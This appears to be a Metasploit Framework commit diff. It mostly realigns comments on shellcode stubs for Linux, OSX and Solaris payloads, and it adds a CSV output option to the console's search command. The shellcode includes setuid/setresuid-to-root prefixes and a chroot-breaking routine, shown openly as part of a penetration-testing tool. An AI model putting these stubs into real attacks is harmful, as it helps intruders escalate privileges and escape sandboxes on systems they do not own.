"\xb0\xb5" + # movb $0xb5,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
# exit(0)
|
||||
app << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x01" +# movb $0x01,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
app << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x01" + # movb $0x01,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -99,113 +99,113 @@ module Msf::Payload::Linux
|
|||
# Prepend
|
||||
|
||||
if (datastore['PrependFork'])
|
||||
pre << "\x6a\x02" +# pushb $0x2 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 ; fork #
|
||||
"\x85\xc0" +# test %eax,%eax #
|
||||
"\x74\x06" +# jz 0xf #
|
||||
"\x31\xc0" +# xor %eax,%eax #
|
||||
"\xb0\x01" +# movb $0x1,%al ; exit #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x6a\x02" + # pushb $0x2 #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" + # int $0x80 ; fork #
|
||||
"\x85\xc0" + # test %eax,%eax #
|
||||
"\x74\x06" + # jz 0xf #
|
||||
"\x31\xc0" + # xor %eax,%eax #
|
||||
"\xb0\x01" + # movb $0x1,%al ; exit #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\xf7\xe3" +# mull %ebx #
|
||||
"\xb0\xa4" +# movb $0xa4,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc9" + # xorl %ecx,%ecx #
|
||||
"\x31\xdb" + # xorl %ebx,%ebx #
|
||||
"\xf7\xe3" + # mull %ebx #
|
||||
"\xb0\xa4" + # movb $0xa4,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x46" +# pushl $0x46 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc9" + # xorl %ecx,%ecx #
|
||||
"\x31\xdb" + # xorl %ebx,%ebx #
|
||||
"\x6a\x46" + # pushl $0x46 #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x17" +# pushl $0x17 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xdb" + # xorl %ebx,%ebx #
|
||||
"\x6a\x17" + # pushl $0x17 #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\xf7\xe3" +# mull %ebx #
|
||||
"\xb0\xaa" +# movb $0xaa,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc9" + # xorl %ecx,%ecx #
|
||||
"\x31\xdb" + # xorl %ebx,%ebx #
|
||||
"\xf7\xe3" + # mull %ebx #
|
||||
"\xb0\xaa" + # movb $0xaa,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x47" +# pushl $0x47 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc9" + # xorl %ecx,%ecx #
|
||||
"\x31\xdb" + # xorl %ebx,%ebx #
|
||||
"\x6a\x47" + # pushl $0x47 #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x2e" +# pushl $0x2e #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xdb" + # xorl %ebx,%ebx #
|
||||
"\x6a\x2e" + # pushl $0x2e #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
if (datastore['PrependChrootBreak'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x31\xc9" +# xorl %ecx,%ecx #
|
||||
"\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x46" +# pushl $0x46 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc9" + # xorl %ecx,%ecx #
|
||||
"\x31\xdb" + # xorl %ebx,%ebx #
|
||||
"\x6a\x46" + # pushl $0x46 #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
|
||||
# break chroot
|
||||
pre << "\x6a\x3d" +# pushl $0x3d #
|
||||
pre << "\x6a\x3d" + # pushl $0x3d #
|
||||
# build dir str (ptr in ebx)
|
||||
"\x89\xe3" +# movl %esp,%ebx #
|
||||
"\x89\xe3" + # movl %esp,%ebx #
|
||||
# mkdir(dir)
|
||||
"\x6a\x27" +# pushl $0x27 #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\x6a\x27" + # pushl $0x27 #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
# chroot(dir)
|
||||
"\x89\xd9" +# movl %ebx,%ecx #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\x89\xd9" + # movl %ebx,%ecx #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
# build ".." str (ptr in ebx)
|
||||
"\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
|
||||
"\x66\x68\x2e\x2e" +# pushw $0x2e2e #
|
||||
"\x89\xe3" +# movl %esp,%ebx #
|
||||
"\x66\x68\x2e\x2e" + # pushw $0x2e2e #
|
||||
"\x89\xe3" + # movl %esp,%ebx #
|
||||
# loop changing dir
|
||||
"\x6a\x3d" +# pushl $0x1e #
|
||||
"\x59" +# popl %ecx #
|
||||
"\xb0\x0c" +# movb $0xc,%al #
|
||||
"\xcd\x80" +# int $0x80 #
|
||||
"\xe2\xfa" +# loop -6 #
|
||||
"\x6a\x3d" + # pushl $0x1e #
|
||||
"\x59" + # popl %ecx #
|
||||
"\xb0\x0c" + # movb $0xc,%al #
|
||||
"\xcd\x80" + # int $0x80 #
|
||||
"\xe2\xfa" + # loop -6 #
|
||||
# final chroot
|
||||
"\x6a\x3d" +# pushl $0x3d #
|
||||
"\x89\xd9" +# movl %ebx,%ecx #
|
||||
"\x58" +# popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
"\x6a\x3d" + # pushl $0x3d #
|
||||
"\x89\xd9" + # movl %ebx,%ecx #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
|
||||
end
|
||||
|
||||
# Append exit(0)
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
app << "\x31\xdb" +# xorl %ebx,%ebx #
|
||||
"\x6a\x01" +# pushl $0x01 #
|
||||
"\x58" +# popl %eax #
|
||||
app << "\x31\xdb" + # xorl %ebx,%ebx #
|
||||
"\x6a\x01" + # pushl $0x01 #
|
||||
"\x58" + # popl %eax #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
|
@ -216,65 +216,65 @@ module Msf::Payload::Linux
|
|||
|
||||
if (datastore['PrependSetresuid'])
|
||||
# setresuid(0, 0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\xa5" +# addi r0,r31,-347 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
|
||||
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\xa5" + # addi r0,r31,-347 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x47" + # addi r0,r31,-441 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x18" +# addi r0,r31,-488 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
|
||||
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x18" + # addi r0,r31,-488 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetresgid'])
|
||||
# setresgid(0, 0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\xa5\x2a\x78" +# xor r5,r5,r5 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\xab" +# addi r0,r31,-341 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
|
||||
"\x7c\xa5\x2a\x78" + # xor r5,r5,r5 #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\xab" + # addi r0,r31,-341 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x48" +# addi r0,r31,-440 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x48" + # addi r0,r31,-440 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x2f" +# addi r0,r31,-465 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
|
||||
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x2f" + # addi r0,r31,-465 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
if (datastore['PrependChrootBreak'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x84\x22\x78" +# xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x47" +# addi r0,r31,-441 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
pre << "\x3b\xe0\x01\xff" + # li r31,511 #
|
||||
"\x7c\x84\x22\x78" + # xor r4,r4,r4 #
|
||||
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x47" + # addi r0,r31,-441 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
|
||||
# EEK! unsupported...
|
||||
end
|
||||
|
@ -282,10 +282,10 @@ module Msf::Payload::Linux
|
|||
# Append exit(0)
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
app << "\x3b\xe0\x01\xff" +# li r31,511 #
|
||||
"\x7c\x63\x1a\x78" +# xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x02" +# addi r0,r31,-510 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
app << "\x3b\xe0\x01\xff" + # li r31,511 #
|
||||
"\x7c\x63\x1a\x78" + # xor r3,r3,r3 #
|
||||
"\x38\x1f\xfe\x02" + # addi r0,r31,-510 #
|
||||
"\x44\xff\xff\x02" # sc #
|
||||
end
|
||||
|
||||
elsif (test_arch.include?(ARCH_X64))
|
||||
|
|
|
@ -78,48 +78,48 @@ module Msf::Payload::Osx
|
|||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x7e" +# movb $0x7e,%al #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x7e" + # movb $0x7e,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x17" +# movb $0x17,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x17" + # movb $0x17,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x7f" +# movb $0x7f,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x7f" + # movb $0x7f,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\xb5" +# movb $0xb5,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\xb5" + # movb $0xb5,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
# exit(0)
|
||||
app << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x01" +# movb $0x01,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
app << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x01" + # movb $0x01,%al #
|
||||
"\xcd\x80" # int $0x80 #
|
||||
end
|
||||
end
|
||||
|
||||
|
@ -127,56 +127,56 @@ module Msf::Payload::Osx
|
|||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x18" +# shl r8, 24
|
||||
"\x49\x83\xc8\x7e" +# or r8, 126 (setreuid=126)
|
||||
"\x4c\x89\xc0" +# mov rax, r8
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x48\x31\xf6" +# xor rsi, rsi 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x18" + # shl r8, 24
|
||||
"\x49\x83\xc8\x7e" + # or r8, 126 (setreuid=126)
|
||||
"\x4c\x89\xc0" + # mov rax, r8
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x48\x31\xf6" + # xor rsi, rsi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x18" +# shl r8, 24
|
||||
"\x49\x83\xc8\x17" +# or r8, 23 (setuid=23)
|
||||
"\x4c\x89\xc0" +# mov rax, r8
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x18" + # shl r8, 24
|
||||
"\x49\x83\xc8\x17" + # or r8, 23 (setuid=23)
|
||||
"\x4c\x89\xc0" + # mov rax, r8
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x18" +# shl r8, 24
|
||||
"\x49\x83\xc8\x7f" +# or r8, 127 (setregid=127)
|
||||
"\x4c\x89\xc0" +# mov rax, r8
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x48\x31\xf6" +# xor rsi, rsi 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x18" + # shl r8, 24
|
||||
"\x49\x83\xc8\x7f" + # or r8, 127 (setregid=127)
|
||||
"\x4c\x89\xc0" + # mov rax, r8
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x48\x31\xf6" + # xor rsi, rsi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x17" +# shl r8, 23
|
||||
"\x49\x83\xc8\x5a" +# or r8, 90 (setgid=181>>1=90)
|
||||
"\x49\xd1\xe0" +# shl r8, 1
|
||||
"\x49\x83\xc8\x01" +# or r8, 1 (setgid=181&1=1)
|
||||
"\x4c\x89\xc0" +# mov rax, r8
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
pre << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x17" + # shl r8, 23
|
||||
"\x49\x83\xc8\x5a" + # or r8, 90 (setgid=181>>1=90)
|
||||
"\x49\xd1\xe0" + # shl r8, 1
|
||||
"\x49\x83\xc8\x01" + # or r8, 1 (setgid=181&1=1)
|
||||
"\x4c\x89\xc0" + # mov rax, r8
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
# exit(0)
|
||||
app << "\x41\xb0\x02" +# mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x18" +# shl r8, 24
|
||||
"\x49\x83\xc8\x01" +# or r8, 1 (exit=1)
|
||||
"\x4c\x89\xc0" +# mov rax, r8
|
||||
"\x48\x31\xff" +# xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
app << "\x41\xb0\x02" + # mov r8b, 0x2 (Set syscall_class to UNIX=2<<24)
|
||||
"\x49\xc1\xe0\x18" + # shl r8, 24
|
||||
"\x49\x83\xc8\x01" + # or r8, 1 (exit=1)
|
||||
"\x4c\x89\xc0" + # mov rax, r8
|
||||
"\x48\x31\xff" + # xor rdi, rdi 0
|
||||
"\x0f\x05" # syscall
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -75,55 +75,55 @@ module Msf::Payload::Solaris
|
|||
if (test_arch.include?(ARCH_X86))
|
||||
|
||||
# Syscall code
|
||||
sc = "\x68\xff\xd8\xff\x3c" +# pushl $0x3cffd8ff #
|
||||
"\x6a\x65" +# pushl $0x65 #
|
||||
"\x89\xe6" +# movl %esp,%esi #
|
||||
"\xf7\x56\x04" +# notl 0x04(%esi) #
|
||||
"\xf6\x16" # notb (%esi) #
|
||||
sc = "\x68\xff\xd8\xff\x3c" + # pushl $0x3cffd8ff #
|
||||
"\x6a\x65" + # pushl $0x65 #
|
||||
"\x89\xe6" + # movl %esp,%esi #
|
||||
"\xf7\x56\x04" + # notl 0x04(%esi) #
|
||||
"\xf6\x16" # notb (%esi) #
|
||||
|
||||
# Prepend
|
||||
|
||||
if (datastore['PrependSetreuid'])
|
||||
# setreuid(0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\xca" +# movb $0xca,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\xca" + # movb $0xca,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetuid'])
|
||||
# setuid(0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x17" +# movb $0x17,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x17" + # movb $0x17,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetregid'])
|
||||
# setregid(0, 0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\xcb" +# movb $0xcb,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\xcb" + # movb $0xcb,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
end
|
||||
|
||||
if (datastore['PrependSetgid'])
|
||||
# setgid(0)
|
||||
pre << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x2e" +# movb $0x2e,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
pre << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x2e" + # movb $0x2e,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
end
|
||||
# Append
|
||||
|
||||
if (datastore['AppendExit'])
|
||||
# exit(0)
|
||||
app << "\x31\xc0" +# xorl %eax,%eax #
|
||||
"\x50" +# pushl %eax #
|
||||
"\xb0\x01" +# movb $0x01,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
app << "\x31\xc0" + # xorl %eax,%eax #
|
||||
"\x50" + # pushl %eax #
|
||||
"\xb0\x01" + # movb $0x01,%al #
|
||||
"\xff\xd6" # call *%esi #
|
||||
end
|
||||
|
||||
# Prepend syscall code to prepend block
|
||||
|
|
|
@ -207,7 +207,7 @@ class Db
|
|||
if names.first == Msf::DBManager::Workspace::DEFAULT_WORKSPACE_NAME
|
||||
print_status("Recreated default workspace")
|
||||
end
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
print_error "Failed to rename workspace: #{e.message}"
|
||||
e.backtrace.each { |line| print_error "#{line}"}
|
||||
end
|
||||
|
@ -544,7 +544,7 @@ class Db
|
|||
when mode == [:tag]
|
||||
begin
|
||||
add_host_tag(host_ranges, tag_name)
|
||||
rescue ::Exception => e
|
||||
rescue => e
|
||||
if e.message.include?('Validation failed')
|
||||
print_error(e.message)
|
||||
else
|
||||
|
@ -1130,7 +1130,7 @@ class Db
|
|||
end
|
||||
|
||||
framework.db.update_note(update_opts)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
elog "There was an error updating note with ID #{note.id}: #{e.message}"
|
||||
next
|
||||
end
|
||||
|
@ -1333,7 +1333,7 @@ class Db
|
|||
end
|
||||
loot.ltype = types.first if types
|
||||
framework.db.update_loot(loot.as_json.symbolize_keys)
|
||||
rescue Exception => e
|
||||
rescue => e
|
||||
elog "There was an error updating loot with ID #{loot.id}: #{e.message}"
|
||||
next
|
||||
end
|
||||
|
|
|
@ -19,8 +19,9 @@ module Msf
|
|||
CMD_USE_TIMEOUT = 3
|
||||
|
||||
@@search_opts = Rex::Parser::Arguments.new(
|
||||
"-h" => [ false, "Help banner."],
|
||||
"-S" => [ true, "Row search filter."],
|
||||
"-h" => [ false, "Help banner"],
|
||||
"-o" => [ true, "Send output to a file in csv format"],
|
||||
"-S" => [ true, "Search string for row filter"],
|
||||
)
|
||||
|
||||
def commands
|
||||
|
@ -410,7 +411,12 @@ module Msf
|
|||
end
|
||||
|
||||
def cmd_search_help
|
||||
print_line "Usage: search <keywords>"
|
||||
print_line "Usage: search [ options ] <keywords>"
|
||||
print_line
|
||||
print_line "OPTIONS:"
|
||||
print_line " -h Show this help information"
|
||||
print_line " -o <file> Send output to a file in csv format"
|
||||
print_line " -S <string> Search string for row filter"
|
||||
print_line
|
||||
print_line "Keywords:"
|
||||
{
|
||||
|
@ -442,26 +448,29 @@ module Msf
|
|||
return
|
||||
end
|
||||
|
||||
match = ''
|
||||
match = ''
|
||||
search_term = nil
|
||||
output_file = nil
|
||||
@@search_opts.parse(args) { |opt, idx, val|
|
||||
case opt
|
||||
when "-t"
|
||||
print_error("Deprecated option. Use type:#{val} instead")
|
||||
cmd_search_help
|
||||
return
|
||||
when "-S", "--search"
|
||||
when "-S"
|
||||
search_term = val
|
||||
when "-h"
|
||||
cmd_search_help
|
||||
return
|
||||
when "-S"
|
||||
search_term = val
|
||||
when '-o'
|
||||
output_file = val
|
||||
else
|
||||
match += val + " "
|
||||
end
|
||||
}
|
||||
|
||||
if match.empty? && search_term.nil?
|
||||
print_error("Keywords or search argument required\n")
|
||||
cmd_search_help
|
||||
return
|
||||
end
|
||||
|
||||
# Display the table of matches
|
||||
tbl = generate_module_table("Matching Modules", search_term)
|
||||
Msf::Modules::Metadata::Cache.instance.find(match).each do |m|
|
||||
|
@ -472,7 +481,15 @@ module Msf
|
|||
m.name
|
||||
]
|
||||
end
|
||||
print_line(tbl.to_s)
|
||||
|
||||
if output_file
|
||||
print_status("Wrote search results to #{output_file}")
|
||||
::File.open(output_file, "wb") { |ofd|
|
||||
ofd.write(tbl.to_csv)
|
||||
}
|
||||
else
|
||||
print_line(tbl.to_s)
|
||||
end
|
||||
end
|
||||
|
||||
